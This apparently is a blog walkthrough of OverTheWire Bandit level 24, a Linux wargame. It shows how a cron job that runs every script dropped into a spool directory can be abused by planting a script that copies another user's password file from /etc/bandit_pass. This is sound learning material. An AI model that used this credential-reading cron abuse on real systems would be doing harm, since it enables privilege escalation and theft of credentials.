Sunday, July 5, 2015

OverTheWire - Bandit - Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around...

Commands you may need to solve this level

  • cron
  • crontab
  • crontab(5) (use man 5 crontab to access this

Helpful Reading Material

Just like the last one, let's check out what the job for bandit24 does inside of /etc/cron.d and then check out what the shell script is doing. 
cat /etc/cron.d/cronjob_bandit24
cat /usr/bin/cronjob_bandit24.sh
Which will give us the following shell script: 
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 "./$i"
        rm -f "./$i"
    fi
done
This looks like it executes all scripts inside of /var/spool/bandit24 as the user bandit24. Let's go to our tmp directory and see what damage we can cause with a couple bash scripts we can write. 
cd /tmp/codebluedev
vim bandit24.sh
Inside of vim (you can choose any other alternative, I just know vim best) let's try to print out the password from /etc/bandit_pass/bandit24 and directing the output to our tmp directory. The final script ends up looking something like this: 
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/codebluedev/bandit24_password.txt
Then we'll change permissions to be sure there are no problems running it, make it an executable, and copy it to the /var/spool/bandit24 directory. 
chmod 777 ./bandit24.sh
chmod +x ./bandit24.sh
cp ./bandit24.sh /var/spool/bandit24
Then we wait until our bandit24_password.txt file appears in which we can cat it out to display the password to the bandit24 level.
on

No comments:

Post a Comment